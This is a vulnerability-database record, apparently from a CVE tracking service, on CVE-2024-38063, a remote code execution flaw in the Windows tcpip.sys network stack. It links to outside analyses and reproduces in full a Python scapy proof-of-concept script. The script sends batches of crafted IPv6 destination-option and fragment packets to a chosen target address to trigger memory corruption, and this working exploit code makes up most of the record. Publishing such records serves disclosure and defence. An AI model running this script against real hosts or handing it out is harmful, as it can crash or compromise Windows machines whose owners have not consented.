{"uuid": "4be2fca3-59f3-437e-a4db-7c0b2f8acb81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Proof of Concept for CVE-2024-38063 - Remote Code Execution Vulnerability in tcpip.sys", "description": "[Proof of Concept for CVE-2024-38063](https://github.com/ynwarcs/CVE-2024-38063), a RCE in tcpip.sys patched on August 13th 2024.\n\nAn [analysis of the vulnerability](https://malwaretech.com/2024/08/exploiting-CVE-2024-38063.html) published on August 27, 2024 by Marcus Hutchins.\n\nPoC published on GitHub on August 24, 2024.\n\n### Implementation\n\nImplementation details are available on [GitHub](https://github.com/ynwarcs/CVE-2024-38063/blob/main/script/cve-2024-38063.py).\n\n```python\nfrom scapy.all import *\n\niface=''\nip_addr=''\nmac_addr=''\nnum_tries=20\nnum_batches=20\n\ndef get_packets_with_mac(i):\n    frag_id = 0xdebac1e + i\n    first = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])\n    second = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'\n    third = Ether(dst=mac_addr) / IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)\n    return [first, second, third]\n\ndef get_packets(i):\n    if mac_addr != '':\n        return get_packets_with_mac(i)\n    frag_id = 0xdebac1e + i\n    first = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])\n    second = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 1, offset = 0) / 'aaaaaaaa'\n    third = IPv6(fl=1, hlim=64+i, dst=ip_addr) / IPv6ExtHdrFragment(id=frag_id, m = 0, offset = 1)\n    return [first, second, third]\n\nfinal_ps = []\nfor _ in range(num_batches):\n    for i in range(num_tries):\n        final_ps += get_packets(i) + get_packets(i)\n\nprint(\"Sending packets\")\nif mac_addr != '':\n    sendp(final_ps, iface)\nelse:\n    send(final_ps, iface)\n\nfor i in range(60):\n    print(f\"Memory corruption will be triggered in {60-i} seconds\", end='\\r')\n    time.sleep(1)\nprint(\"\")\n```", "description_format": "markdown", "vulnerability": "CVE-2024-38063", "creation_timestamp": "2024-08-28T08:55:21.234923+00:00", "timestamp": "2024-08-30T12:36:21.633241+00:00", "related_vulnerabilities": [], "meta": [{"tags": ["vulnerability:exploitability=documented", "vulnerability:information=PoC"]}], "author": {"login": "cedric", "name": "C\u00e9dric Bonhomme", "uuid": "af0120d0-3dac-4a6a-974b-a9f33d2a9846"}}